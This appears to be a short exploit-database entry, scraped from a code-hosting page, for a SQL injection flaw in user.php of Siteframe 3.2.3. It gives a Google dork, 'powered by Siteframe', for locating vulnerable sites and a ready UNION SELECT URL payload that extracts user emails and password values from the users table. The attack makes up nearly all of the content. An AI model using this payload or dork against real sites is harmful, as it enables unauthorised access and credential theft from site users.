17 lines
No EOL
589 B
Text
Executable file
17 lines
No EOL
589 B
Text
Executable file
# Exploit Title: Siteframe 'user.php' SQL Injection Vulnerability
|
|
# Google Dork: "powered by Siteframe"
|
|
# Date: 29/12/2010
|
|
# Author: AnGrY BoY
|
|
# Software Link: http://sitefrane.org/downloads/
|
|
# Version: Siteframe 3.2.3
|
|
# Tested on: windows SP2
|
|
# CVE : N/A
|
|
|
|
# expolit:
|
|
|
|
# http://localhost/path/user.php?id=[SQL]
|
|
|
|
# http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--
|
|
|
|
======================================================================================
|
|
# Special Thanks:- all h4kurd members |